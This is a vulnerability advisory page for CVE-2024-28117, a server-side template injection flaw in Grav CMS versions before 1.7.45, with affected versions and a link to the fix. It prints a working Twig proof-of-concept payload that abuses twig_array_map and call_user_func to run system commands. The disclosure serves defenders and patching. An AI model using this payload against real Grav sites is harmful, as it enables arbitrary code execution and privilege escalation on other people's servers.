high
8.8
CWE
94
EPSS
0.043%
Advisory Published
Advisory Published
Updated

CVE-2024-28117: Grav vulnerable to Server Side Template Injection (SSTI)

First published: Thu Mar 21 2024(Updated: )

### Summary Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands. ### Details ``` {{ grav.twig.twig.getFunction('twig_array_map')|var_dump }} ``` ![image](https://user-images.githubusercontent.com/46442697/281397674-6098806a-e936-4849-956e-d394a7c037da.png) When we accessed twig_array_map like this, we confirmed that the twigFunction object is properly returned. Since the callable property is correctly included, we can access twig_array_map without any restrictions. ``` {% set cmd = {'id':'system'} %} {{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }} ``` Since there is no validation on twig_array_map itself, it is possible to call arbitrary function using call_user_func. ### PoC ``` {% set cmd = {'id':'system'} %} {{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }} ``` ### Impact Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
composer/getgrav/grav<1.7.45
1.7.45
Getgrav Grav<1.7.45

Remedy

https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203